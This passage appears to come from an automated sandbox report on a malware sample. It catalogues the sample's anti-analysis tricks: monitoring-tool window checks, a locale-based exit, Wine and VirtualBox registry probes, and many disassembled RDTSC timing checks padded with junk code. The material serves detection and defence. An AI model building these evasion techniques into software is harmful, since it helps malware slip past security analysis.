These are window class names: FilemonClass and RegmonClass belong to the long-retired Sysinternals Filemon and Regmon, PROCMON_WINDOW_CLASS to Process Monitor ("Tries to detect process monitoring tools" and "Tries to detect sandboxes and other dynamic analysis tools (window names)" in the signature list). Because the lookup is by class name, a monitoring tool whose window class has been renamed, or that runs without a window at all, is not seen.
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E79BB0 (the same LoadLibraryA/GetProcAddress import resolver listed under Data Obfuscation, here matched by "Contains functionality to dynamically determine API calls")

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-37989). The sample reads the user's default language and can exit straight away depending on the result, a pattern common to stealers sold on Russian-speaking forums, which refuse to run on CIS-country locales; the report does not say which language IDs this build checks, so a sandbox should simply not use one of them.
Source: C:\Users\user\Desktop\file.exe | Registry key opened (reported as "File opened"): HKEY_CURRENT_USER\Software\Wine (exists only under Wine)
Source: C:\Users\user\Desktop\file.exe | Registry key opened (reported as "File opened"): HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (the ACPI DSDT table name a stock VirtualBox guest exposes; a hardened sandbox changes it)
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor ("Tries to detect virtualization through RDTSC time measurements"): pairs of rdtsc reads with junk code between them measure elapsed cycles, and a hypervisor that traps rdtsc, or a debugger single-stepping the gap, inflates the delta. Address of each pair and the instructions between the two reads:
    114E297 -> 114E2B4: rdtsc; jmp 00007F9EA4BB43D9h; pop edx; pop eax; rdtsc
    114E2B4 -> 114E2BE: rdtsc; push eax; push edx; jp 00007F9EA509B5D6h; rdtsc
    12C529A -> 12C52B6: rdtsc; push eax; push edx; jc 00007F9EA4BB43C6h; jmp 00007F9EA4BB43D2h; rdtsc
    12C80F4 -> 12C80F9: rdtsc; pop edx; pop eax; pop eax; rdtsc
    12C80F9 -> 12C8140: rdtsc; pushad; push ecx; pop ecx; pushad; popad; popad; pop edx; pop eax; mov dword ptr [esp], eax; sbb di, A5B8h; push 00000000h; mov di, 743Bh; push 4148EF0Fh; push eax; push edx; pushad; jmp 00007F9EA4BB43D8h; jmp 00007F9EA4BB43CEh; popad; rdtsc
    12C8255 -> 12C8271: rdtsc; pop edx; pop eax; pushad; popad; popad; pop ecx; push eax; push eax; push edx; jmp 00007F9EA509B5E1h; rdtsc
    12C8271 -> 12C8288: rdtsc; push eax; push edx; jmp 00007F9EA4BB43D3h; rdtsc
    12C8288 -> 12C828C: rdtsc; push eax; push edx; rdtsc
    12C828C -> 12C82DF: rdtsc; pop edx; pop eax; pop edx; pop eax; pop edx; pop eax; nop; mov esi, dword ptr [ebp+122D370Ah]; push 00000000h; mov ecx, dword ptr [ebp+122D39DEh]; call 00007F9EA4BB43C9h; pushad; js 00007F9EA4BB43C8h; pushad; popad; jmp 00007F9EA4BB43D0h; popad; push eax; pushad; pushad; jmp 00007F9EA4BB43D4h; push eax; push edx; rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C82DF second address: 12C833D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F9EA509B5D8h 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jne 00007F9EA509B5FAh 0x00000016 mov eax, dword ptr [eax] 0x00000018 jns 00007F9EA509B5DEh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jg 00007F9EA509B5DCh 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C833D second address: 12C83C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000003h 0x0000000c call 00007F9EA4BB43CAh 0x00000011 jmp 00007F9EA4BB43D3h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F9EA4BB43C8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov ecx, dword ptr [ebp+122D38C2h] 0x00000039 push 00000003h 0x0000003b or si, 1D12h 0x00000040 call 00007F9EA4BB43C9h 0x00000045 push eax 0x00000046 js 00007F9EA4BB43CCh 0x0000004c jns 00007F9EA4BB43C6h 0x00000052 pop eax 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push ecx 0x00000057 jne 00007F9EA4BB43C6h 0x0000005d pop ecx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C83C1 second address: 12C83C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C83C7 second address: 12C843B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 jc 00007F9EA4BB43C6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 jmp 00007F9EA4BB43D5h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 jmp 00007F9EA4BB43D8h 0x0000002e pop eax 0x0000002f jnl 00007F9EA4BB43CCh 0x00000035 lea ebx, dword ptr [ebp+1244E005h] 0x0000003b js 00007F9EA4BB43CAh 0x00000041 mov dx, A371h 0x00000045 clc 0x00000046 xchg eax, ebx 0x00000047 push ecx 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C843B second address: 12C844A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C844A second address: 12C844E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C844E second address: 12C8458 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9EA509B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C84E7 second address: 12C8517 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9EA4BB43C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F9EA4BB43D9h 0x00000015 jo 00007F9EA4BB43C6h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8517 second address: 12C8521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F9EA509B5D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8521 second address: 12C856D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ebx 0x00000010 pushad 0x00000011 jmp 00007F9EA4BB43D3h 0x00000016 jp 00007F9EA4BB43C6h 0x0000001c popad 0x0000001d pop ebx 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jno 00007F9EA4BB43C6h 0x00000029 jmp 00007F9EA4BB43CDh 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C856D second address: 12C858B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9EA509B5DCh 0x00000008 jnp 00007F9EA509B5D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F9EA509B5D8h 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C858B second address: 12C85D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a add dword ptr [ebp+122D1A8Eh], eax 0x00000010 push 00000003h 0x00000012 jmp 00007F9EA4BB43CDh 0x00000017 push 00000000h 0x00000019 mov edx, dword ptr [ebp+122D389Eh] 0x0000001f push 00000003h 0x00000021 mov edi, esi 0x00000023 call 00007F9EA4BB43C9h 0x00000028 push ecx 0x00000029 push ecx 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c pop ecx 0x0000002d pop ecx 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jg 00007F9EA4BB43C8h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C85D6 second address: 12C8649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e jo 00007F9EA509B5E1h 0x00000014 pop ebx 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 pushad 0x00000019 jmp 00007F9EA509B5DFh 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 je 00007F9EA509B5D8h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e pushad 0x0000002f push ecx 0x00000030 jmp 00007F9EA509B5E6h 0x00000035 pop ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 jp 00007F9EA509B5D6h 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8649 second address: 12C8665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov esi, ebx 0x0000000a lea ebx, dword ptr [ebp+1244E010h] 0x00000010 mov edi, dword ptr [ebp+122D398Ah] 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8665 second address: 12C8669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8669 second address: 12C8673 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8673 second address: 12C8677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8677 second address: 12C869E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F9EA4BB43D9h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C869E second address: 12C86A8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9EA509B5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA3FD second address: 12DA407 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9EA4BB43C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA407 second address: 12DA411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F9EA509B5D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E894C second address: 12E895F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9EA4BB43C6h 0x00000008 jl 00007F9EA4BB43C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E895F second address: 12E896A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9EA509B5D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E896A second address: 12E8972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8972 second address: 12E8976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8ACC second address: 12E8AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8AD3 second address: 12E8AD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8AD9 second address: 12E8ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8F74 second address: 12E8F78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8F78 second address: 12E8F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8F80 second address: 12E8F9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E6h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E8F9B second address: 12E8FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F9EA4BB43CEh 0x00000014 jng 00007F9EA4BB43C6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F9EA4BB43CEh 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E9264 second address: 12E926F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9EA509B5D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E926F second address: 12E92A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9EA4BB43D5h 0x0000000a jmp 00007F9EA4BB43CAh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F9EA4BB43C6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E92A3 second address: 12E92A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E958F second address: 12E95A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA4BB43D3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E9B2E second address: 12E9B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B8473 second address: 12B847B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA264 second address: 12EA268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA268 second address: 12EA28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA4BB43D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F9EA4BB43CEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA28A second address: 12EA290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA290 second address: 12EA298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA298 second address: 12EA2A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F9EA509B5DCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA3CD second address: 12EA3D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA3D1 second address: 12EA3D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12EA3D7 second address: 12EA3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ECE26 second address: 12ECE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 jng 00007F9EA509B5DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ECE37 second address: 12ECE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a jmp 00007F9EA4BB43D5h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ECE59 second address: 12ECE7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 jmp 00007F9EA509B5DAh 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F9EA509B5DCh 0x0000001b js 00007F9EA509B5D6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F0EB6 second address: 12F0EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ACA0C second address: 12ACA11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ACA11 second address: 12ACA17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6F77 second address: 12F6F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F6F7B second address: 12F6F9C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9EA4BB43C6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F9EA4BB43EEh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9EA4BB43CBh 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F710C second address: 12F7126 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9EA509B5E2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7126 second address: 12F712E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F712E second address: 12F7134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F727D second address: 12F7283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7283 second address: 12F7287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7409 second address: 12F7411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7411 second address: 12F742A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9EA509B5E5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F773D second address: 12F7745 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F78B0 second address: 12F78B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F7A1C second address: 12F7A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9BE6 second address: 12F9C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9EA509B5D6h 0x0000000a popad 0x0000000b popad 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F9EA509B5D8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D26C1h], ebx 0x0000002d push 832DA66Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F9EA509B5E6h 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9C34 second address: 12F9C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9EA4BB43CBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9E7F second address: 12F9E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9E84 second address: 12F9E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F9E8A second address: 12F9E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA064 second address: 12FA069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA0F1 second address: 12FA0FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F9EA509B5D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA769 second address: 12FA76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA76D second address: 12FA771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAC9F second address: 12FACA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FACA6 second address: 12FACCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D28E5h], ebx 0x0000000e xchg eax, ebx 0x0000000f jmp 00007F9EA509B5DFh 0x00000014 push eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
